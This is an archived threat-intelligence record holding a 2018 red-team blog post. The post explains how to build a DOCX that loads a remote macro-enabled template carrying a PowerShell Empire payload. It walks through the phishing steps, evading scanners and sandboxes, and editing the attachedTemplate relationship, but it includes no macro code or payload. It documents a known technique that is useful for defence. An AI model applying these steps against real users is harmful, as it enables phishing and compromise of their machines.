{
	"id": "75e97b42-1db9-4885-b551-08af73028f87",
	"created_at": "2026-04-06T00:08:27.275378Z",
	"updated_at": "2026-04-10T03:22:12.650224Z",
	"deleted_at": null,
	"sha1_hash": "5f8aba2fbdd566b06db76aedd6da6bcb6e792757",
	"title": "Executing Macros From a DOCX With Remote Template Injection",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 732231,
	"plain_text": "Executing Macros From a DOCX With Remote Template Injection\r\nBy BinaryFaultline\r\nPublished: 2018-07-19 · Archived: 2026-04-05 20:30:33 UTC\r\nThe What:\r\nIn this post, I want to talk about and show off a code execution method which was shown to me a little while back.\r\nThis method allows one to create a DOCX document which will load up and allow a user to execute macros using\r\na remote DOTM template file. This attack has been seen in the wild, is partially included in open-source offensive\r\nsecurity tools, as has been blogged about by Cisco Talos, but in the blog post and the open-source tool, it is only\r\nseen as a credential stealing attack typically over the SMB protocol. This blog post will detail how to use this\r\nmethod to download a macro-enabled template over HTTP(S) in a proxy-aware method into a DOCX document.\r\nThe Why:\r\nThe benefit of this attack versus a traditional macro enabled document is multidimensional. When executing a\r\nphishing attack against a target, you able to attach the .docx directly to the email and you are very unlikely to get\r\nblocked based on the file extension. Many organizations block .doc or .docm but allow .docx because they are not\r\nsupposed to be able to contain macros.\r\nAnother reason this attack will likely land more often is because the attachment itself does not contain malicious\r\ncode. The macro itself is not seen by any static email scanners so it is less likely to be blocked. In the event that\r\nyour target uses a sandbox to detonate email attachments, you can use various sandbox evasion techniques such as\r\nmodrewrite rules or IP limiting to prevent the sandbox from being able to pull down the malicious template.\r\n@bluescreenofjeff has a wonderful guide on creating modrewrite rules for this type of evasion in his Red Team\r\nInfrastructure Wiki.  \r\nThe How:\r\nTo start this attack, we need to create two different files. The first will be the macro-enabled template, or .dotm\r\nfile, which will contain a malicious VBA macro. The second will be the seemingly benign .docx file which\r\ncontains no malicious code itself, only a target link which points to your malicious template file.\r\nGetting Started:\r\nIn my blog posts and trainings that I provide to others, I aim to show examples using free and open-source tools. I\r\ndo this because I want anyone reading this blog to be able to try it on their own (always against their own systems\r\nor systems which they have permission to try it on) and do not want to force people into purchasing commercial\r\ntools. For this reason, I will walk through the steps for creating the remote template document to execute a\r\nhttp://blog.redxorblue.com/2018/07/executing-macros-from-docx-with-remote.html\r\nPage 1 of 8\n\nPowerShell Empire payload. To keep to the purpose of this post, I won’t detail out how to create the listener or the\r\nmacro for Empire here. There are many tutorials out there on how to do this already. I will just walk through\r\ncreating the documents to execute the macro.\r\nCreating the Macro-Enabled Template:\r\nFor this attack to work, we need to create a macro-enabled Word template (.dotm file extension) which contains\r\nour malicious Empire macro. Open up Word and make the Developer tab on the ribbon visible:\r\nThen open up the Visual Basic editor from the Developer tab and double-click on ThisDocument under the current\r\nproject to open up the code window. Paste in your macro code into this window:\r\nhttp://blog.redxorblue.com/2018/07/executing-macros-from-docx-with-remote.html\r\nPage 2 of 8\n\nGive the template a name and save the file as a .dotm format. Please note that the name is usually briefly visible to\r\nthe user, so I recommend something seemingly benign such as ‘InvoiceTemplate.dotm’:\r\nSince I am just using the default macro from PowerShell Empire, it quickly is picked up by Windows Defender, so\r\nI am going to disable it for the demo. If your target uses Windows Defender, you will need to pick a different tool\r\nor perform obfuscation until you can get a working macro.\r\nhttp://blog.redxorblue.com/2018/07/executing-macros-from-docx-with-remote.html\r\nPage 3 of 8\n\nAt this point, I tend to like to validate my template and macro by just double-clicking on the document and\r\nmaking sure that I get the ‘Enable Content’ button and that I get an agent when I click on it:\r\nIt works!\r\nCreating the Remote-Template-Loading Document:\r\nWith the template working, we now need to create a .docx file that will download and load in the template from a\r\nremote resource. The easiest way in which I have found to do this is to create a .docx document from one of the\r\nprovided Word templates, then just modify the target:\r\nhttp://blog.redxorblue.com/2018/07/executing-macros-from-docx-with-remote.html\r\nPage 4 of 8\n\nModify the document as necessary to meet your phishing scenario in order to get your target user to click the\r\n‘Enable Content’ button if it shows up for them. Save your document in the .docx format.\r\nNext, find the document and right-click and rename the extension on the document from .docx to .zip. Extract the\r\ncontents of the zip file to a folder and browse to that folder.\r\nNote: With the release of Office 2007, Microsoft introduced the formats that end in an ‘x’ character. Each of these\r\nformats are just zip files containing mostly .xml and .rel files. You can manually edit the document and its\r\nproperties by changing these files then re-zipping the contents.\r\nNavigate to the ‘.\\word\\_rels\\’ folder and open up the ‘settings.xml.rels’ file using a text editor such as Notepad:\r\nhttp://blog.redxorblue.com/2018/07/executing-macros-from-docx-with-remote.html\r\nPage 5 of 8\n\nThe Relationship tag containing a Type with attachedTemplate will be the setting that tells Word where to load in\r\nyour template from when you open that .docx. Currently, this is loading in a template from the local file system:\r\nThe key is that this value will accept web URLs. We can modify the Target value to be a remote location. In this\r\ncase, I host my macro-enabled template on GitHub:\r\nOnce we save this file, we can zip the contents back up and rename the file back to a .docx. The next time that we\r\nopen up our .docx, we can see that the file is reaching out over HTTPS to our hosting service to download the\r\ntemplate:\r\nhttp://blog.redxorblue.com/2018/07/executing-macros-from-docx-with-remote.html\r\nPage 6 of 8\n\nAnd now our .docx file has a macro loaded in it and is allowed to run macros:\r\nThere is a new pop-up to the user, but it does not affect the payload. This is just due to the fact that .docx files are\r\nnot intended to contain macros. If the user clicks ‘Enable Content’ or has macros set to run automatically, then we\r\nget our agents:\r\nhttp://blog.redxorblue.com/2018/07/executing-macros-from-docx-with-remote.html\r\nPage 7 of 8\n\nNow prep your phishing email, send the .docx to the user, and wait for the call backs!\r\nSource: http://blog.redxorblue.com/2018/07/executing-macros-from-docx-with-remote.html\r\nhttp://blog.redxorblue.com/2018/07/executing-macros-from-docx-with-remote.html\r\nPage 8 of 8",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MITRE"
	],
	"references": [
		"http://blog.redxorblue.com/2018/07/executing-macros-from-docx-with-remote.html"
	],
	"report_names": [
		"executing-macros-from-docx-with-remote.html"
	],
	"threat_actors": [],
	"ts_created_at": 1775434107,
	"ts_updated_at": 1775791332,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/5f8aba2fbdd566b06db76aedd6da6bcb6e792757.pdf",
		"text": "https://archive.orkl.eu/5f8aba2fbdd566b06db76aedd6da6bcb6e792757.txt",
		"img": "https://archive.orkl.eu/5f8aba2fbdd566b06db76aedd6da6bcb6e792757.jpg"
	}
}